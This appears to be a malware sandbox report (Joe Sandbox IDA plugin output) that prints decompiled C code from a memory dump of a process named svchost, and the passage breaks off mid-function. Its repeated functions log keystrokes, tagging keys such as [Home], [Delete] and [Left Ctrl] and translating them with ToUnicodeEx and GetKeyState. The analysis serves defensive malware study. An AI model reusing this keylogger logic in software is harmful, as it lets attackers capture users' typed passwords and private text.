ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Select], xrefs: 00C859D4
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C47, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C47(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Home]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Home], xrefs: 00C85C49

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85CF1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CF1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Stop]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Stop], xrefs: 00C85CF3

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A6B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A6B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Delete]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Delete], xrefs: 00C85A6D

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85BE1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BE1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F5]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[F5], xrefs: 00C85BE3
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C69, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C69(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mail]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Mail], xrefs: 00C85C6B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85AF3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AF3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F14]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[F14], xrefs: 00C85AF5
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C8B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C8B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
